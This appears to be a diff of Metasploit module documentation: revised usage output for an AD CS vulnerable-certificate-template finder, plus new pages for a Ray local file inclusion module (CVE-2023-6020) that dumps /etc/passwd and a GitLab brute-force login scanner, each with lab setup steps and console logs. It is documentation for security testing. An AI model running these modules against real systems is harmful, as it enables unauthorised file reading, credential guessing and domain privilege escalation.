+If set to `False` then skip over these certificate templates and only report on certificate templates that are
+enrollable by at least one additional user or group.
+
 ## Scenarios

 ### Windows Server 2022 with AD CS
 ```msf
-msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
-RHOST => 172.26.104.157
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_DN DAFOREST\\Administrator
-BIND_DN => DAFOREST\Administrator
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_PW theAdmin123
-BIND_PW => theAdmin123
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
-
-Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
-
-   Name                  Current Setting         Required  Description
-   ----                  ---------------         --------  -----------
-   BASE_DN                                       no        LDAP base DN if you already have it
-   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
-   BIND_PW               theAdmin123             no        Password for the BIND_DN
-   REPORT_NONENROLLABLE  false                   yes       Report nonenrollable certificate templates
-   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT                 389                     yes       The target port
-   SSL                   false                   no        Enable SSL on the LDAP connection
-
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
-[*] Running module against 172.26.104.157
+[*] Running module against 192.168.159.10

 [*] Discovering base DN automatically
-[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
-[*] Template: SubCA
-[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC1-Template
-[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC2-Template
-[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC3-Template1
-[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: User
-[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: Administrator
-[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: Machine
-[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: DomainController
-[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]       * S-1-5-9 (Enterprise Domain Controllers)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC3-Template2
-[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
+[!] Couldn't find any vulnerable ESC13 templates!
+[+] Template: ESC1-Test
+[*]   Distinguished Name: CN=ESC1-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC1
+[*]   Notes: ESC1: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag)
+[*]     Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-513 (Domain Users)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins)
+[+]   Issuing CA: msflab-DC-CA (DC.msflab.local)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins)
+[+] Template: ESC2-Test
+[*]   Distinguished Name: CN=ESC2-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC2
+[*]   Notes: ESC2: Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage)
+[*]     Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-513 (Domain Users)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins)
+[+]   Issuing CA: msflab-DC-CA (DC.msflab.local)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins)
+[*]       * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins)
 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
-```
-
-### Windows Server 2022 with AD CS and REPORT_NONENROLLABLE Set To TRUE
-```msf
-msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
-RHOST => 172.26.104.157
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_DN DAFOREST\\Administrator
-BIND_DN => DAFOREST\Administrator
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_PW theAdmin123
-BIND_PW => theAdmin123
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set REPORT_NONENROLLABLE true
-REPORT_NONENROLLABLE => true
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
-
-Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
-
-   Name                  Current Setting         Required  Description
-   ----                  ---------------         --------  -----------
-   BASE_DN                                       no        LDAP base DN if you already have it
-   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
-   BIND_PW               theAdmin123             no        Password for the BIND_DN
-   REPORT_NONENROLLABLE  true                    yes       Report nonenrollable certificate templates
-   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT                 389                     yes       The target port
-   SSL                   false                   no        Enable SSL on the LDAP connection
-
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
-[*] Running module against 172.26.104.157
-
-[*] Discovering base DN automatically
-[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
-[*] Template: CA
-[*]    Distinguished Name: CN=CA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    CA not published as an enrollable certificate!
-[*] Template: SubCA
-[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: OfflineRouter
-[*]    Distinguished Name: CN=OfflineRouter,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1, ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    OfflineRouter not published as an enrollable certificate!
-[*] Template: ESC1-Template
-[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC2-Template
-[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: EnrollmentAgent
-[*]    Distinguished Name: CN=EnrollmentAgent,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    EnrollmentAgent not published as an enrollable certificate!
-[*] Template: EnrollmentAgentOffline
-[*]    Distinguished Name: CN=EnrollmentAgentOffline,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    EnrollmentAgentOffline not published as an enrollable certificate!
-[*] Template: MachineEnrollmentAgent
-[*]    Distinguished Name: CN=MachineEnrollmentAgent,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    MachineEnrollmentAgent not published as an enrollable certificate!
-[*] Template: CEPEncryption
-[*]    Distinguished Name: CN=CEPEncryption,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    CEPEncryption not published as an enrollable certificate!
-[*] Template: ESC3-Template1
-[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: User
-[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: UserSignature
-[*]    Distinguished Name: CN=UserSignature,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    UserSignature not published as an enrollable certificate!
-[*] Template: SmartcardUser
-[*]    Distinguished Name: CN=SmartcardUser,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    SmartcardUser not published as an enrollable certificate!
-[*] Template: ClientAuth
-[*]    Distinguished Name: CN=ClientAuth,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    ClientAuth not published as an enrollable certificate!
-[*] Template: SmartcardLogon
-[*]    Distinguished Name: CN=SmartcardLogon,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[!]    SmartcardLogon not published as an enrollable certificate!
-[*] Template: Administrator
-[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: Machine
-[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: DomainController
-[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]       * S-1-5-9 (Enterprise Domain Controllers)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC3-Template2
-[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```
@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+Ray (<=v2.6.3) is vulnerable to local file inclusion (CVE-2023-6020)
+
+The vulnerability affects:
+
+    * Ray (<=v2.6.3)
+
+This module was successfully tested on:
+
+    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+
+### Install and run the vulnerable Ray (v2.6.3)
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Ray docker container (v2.6.3) in your VM.
+   `docker pull rayproject/ray:2.6.3`
+4. Start the ray container.
+   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
+5. Start ray.
+   `ray start --head --dashboard-host=0.0.0.0`
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/ray_lfi_cve_2023_6020`
+4. Do: `set rhost <rhost>`
+5. Do: `run`
+6. You should get a file content
+
+## Options
+
+### FILEPATH (Required)
+
+This is the file to read. Default is `/etc/passwd`.
+
+## Scenarios
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+```
+msf6 > use auxiliary/gather/ray_lfi_cve_2023_6020
+msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check
+[+] 192.168.56.6:8265 - The target is vulnerable.
+msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > run
+[*] Running module against 192.168.56.6
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+ray:x:1000:100::/home/ray:/bin/bash
+
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module was successfully tested on:
+
+    * gitlab-ce (v17.2.2-ce.0) installed with Docker on Kali Linux 6.6.15
+
+### Description
+
+This module is a brute-force login scanner that attempts to authenticate to the GitLab with username and password combinations.
+
+## Installation (latest version of gitlab-ce at the time of this writing)
+
+1. `docker pull gitlab/gitlab-ce:17.2.2-ce.0`
+2. `sudo mkdir -p /srv/gitlab/config /srv/gitlab/logs /srv/gitlab/data`
+3. Run the GitLab.
+```
+docker run --detach \                                              
+--hostname localhost \
+--publish 443:443 --publish 80:80 --publish 22:22 \
+--name gitlab \
+--restart always \
+--volume /srv/gitlab/config:/etc/gitlab \
+--volume /srv/gitlab/logs:/var/log/gitlab \
+--volume /srv/gitlab/data:/var/opt/gitlab \
+gitlab/gitlab-ce:17.2.2-ce.0
+```
+4. (Get initial password)
+   `docker exec gitlab cat etc/gitlab/initial_root_password | grep Password:`
+
+## Verification Steps
+
+1. Install GitLab and start it
+2. Start `msfconsole`
+3. Do: `use auxiliary/scanner/http/gitlab_login`
+4. Do: `set rhosts`
+5. Do: set usernames and passwords via the `username` and `password` options, or pass a list via `user_file` and `pass_file` options
+5. Do: `run`
+6. You will hopefully see something similar to:
+
+```
+[+] 192.168.56.6:80 - Login Successful: root:strongpasswordcannotguess
+```
+
+## Options
+
+## Scenarios
+
+### Single set of credentials being passed
+```
+msf6 > use auxiliary/scanner/http/gitlab_login
+msf6 auxiliary(scanner/http/gitlab_login) > run rhosts=192.168.56.6 username=root password=strongpasswordcannotguess
+
+[*] 192.168.56.6:80 - GitLab v7 login page
+[!] No active DB -- Credential data will not be saved!
+[+] 192.168.56.6:80 - Login Successful: root:strongpasswordcannotguess
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Multiple credentials being passed
+```
+msf6 > use auxiliary/scanner/http/gitlab_login
+msf6 auxiliary(scanner/http/gitlab_login) > run rhosts=192.168.56.6 user_file=/tmp/user.txt pass_file=/tmp/pass.txt
+
+[*] 192.168.56.6:80 - GitLab v7 login page
+[!] No active DB -- Credential data will not be saved!
+[-] 192.168.56.6:80 - LOGIN FAILED: root:123456 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: root:123456789 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: root:picture1 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: root:password (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: root:12345678 (Incorrect)
+[+] 192.168.56.6:80 - Login Successful: root:strongpasswordcannotguess
+[-] 192.168.56.6:80 - LOGIN FAILED: admin:123456 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: admin:123456789 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: admin:picture1 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: admin:password (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: admin:12345678 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: admin:strongpasswordcannotguess (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: test:123456 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: test:123456789 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: test:picture1 (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: test:password (Incorrect)
+[-] 192.168.56.6:80 - LOGIN FAILED: test:12345678 (Incorrect)
